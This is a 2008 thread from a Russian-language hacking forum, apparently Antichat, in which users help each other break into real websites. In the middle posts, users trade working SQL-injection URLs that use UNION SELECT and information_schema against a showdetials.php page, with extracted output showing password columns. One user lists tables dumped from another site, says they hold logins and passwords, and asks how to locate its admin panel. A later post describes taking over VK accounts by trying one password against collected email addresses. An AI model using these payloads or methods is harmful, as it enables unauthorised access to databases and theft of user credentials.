ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

30.09.2008, 20:55
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Обновления может стоят... фиревол, антивирус...
|
|
|

30.09.2008, 22:07
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
вот етого я незнаю что у него там стоит))) но тип етот самоувереный болван)
|
|
|

01.10.2008, 23:03
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от MaSTeR GэN
а данные к админке есть в базе ? )) или file_priv ?
Фаил прив всяко нету,а пароли никто не может расшифровать пле).Да и потом,толку иметь логин пароль от админки,не имея доступа к админке ?
|
|
|

02.10.2008, 01:04
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме: 110445
Репутация:
1
|
|
NEED HELP WITH THIS
/showdetials.php?id=53%20union%20select%201,2,3,4,5 ,6,7,8,9,10,database(),12,13,14,15%20--
IT WORKS WILL
AFTER I DO WITH INFORMATION_SCHEMA.TABLES
/showdetials.php?id=53%20union%20select%201,2,3,4,5 ,6,7,8,9,10,concat(table_name,0x3e,column_name,0x3 e,table_schema)
,12,13,14,15%20from%20information_schema.columns%2 0WHERE%20column_name%20LIKE%20CHAR(37,112,97,115,1 15,37)--
NOTHING I DIDNT SEE THIS BEFORE SO PLS HELP
|
|
|

02.10.2008, 01:32
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме: 4608122
Репутация:
874
|
|
showdetials.php?id=53+union+select+1,2,3,4,5,6,7,8 ,9,10, UNHEX(HEX(concat(table_name,0x3e,column_name,0x3e,table_sch ema))),12,13,14,15+from+information_schema.columns +WHERE+column_name+LIKE+CHAR(37,112,97,115,115,37)/*
Код:
13
course_enroll>course_enroll_pass>elearn
التاريخ : 8
13
dept_member>PASS>elearn
التاريخ : 8
13
members>PASS>elearn
...
...

Последний раз редактировалось Red_Red1; 02.10.2008 в 02:13..
|
|
|

02.10.2008, 01:57
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме: 110445
Репутация:
1
|
|
showdetials
U DID GOOGLE ON THIS
HAHA THANX MAN U REALY APRO
BUT IT APPEARS ON WHAT SOURCE OR WHAT
|
|
|

03.10.2008, 12:17
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
admin_access
admin_groups
content_categories_est
content_categories_rus
content_links_eng
content_links_est
content_links_rus
content_objects_eng
content_objects_est
content_objects_rus
ctlg_projects
gallery
news_eng
news_est
news_rus
nlsbo_est
nlsbo_rus
nlsf_est
nlsf_rus
sets_languages
users_sess
Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=
ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.
|
|
|

03.10.2008, 14:05
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Вопрос для всех! Извените если пишу не по теме просто не знаю куда писать!
Мне взлломали контакт! Без мыла как это зделали,,,,???
Кто знает отпешите если есть пост кинте сылку!!!
|
|
|

03.10.2008, 14:08
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Сообщение от Велемир
admin_access
admin_groups
content_categories_est
content_categories_rus
content_links_eng
content_links_est
content_links_rus
content_objects_eng
content_objects_est
content_objects_rus
ctlg_projects
gallery
news_eng
news_est
news_rus
nlsbo_est
nlsbo_rus
nlsf_est
nlsf_rus
sets_languages
users_sess
Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=
ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.
Скрипт наверника самописный! А вобще скинь сылочку нада так посмотреть!
|
|
|

03.10.2008, 14:13
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
я в локале нашол уязвимую тачку пробую запустить експлоит вроде все норм запускаеться :
http://avoreg.ru/pic_b/b2c6499060567ddbff7fc2e67c484d33.jpg
но как видно на скрине команды тупо не выполняються... искал я на ету тему в гугле инфу нашол скрин удачного пробивава етим сплоитом и там после WooT вылетала командная строка а тут нет... Как етого можно добиться?
ЗЫ
geforce просто человек собрал базу мыл (где присуствовало твое мыло) и просто в тупую перебирал эти мыла вконтакте на один пароль вот и попадаються такие
Последний раз редактировалось diznt; 03.10.2008 в 14:28..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|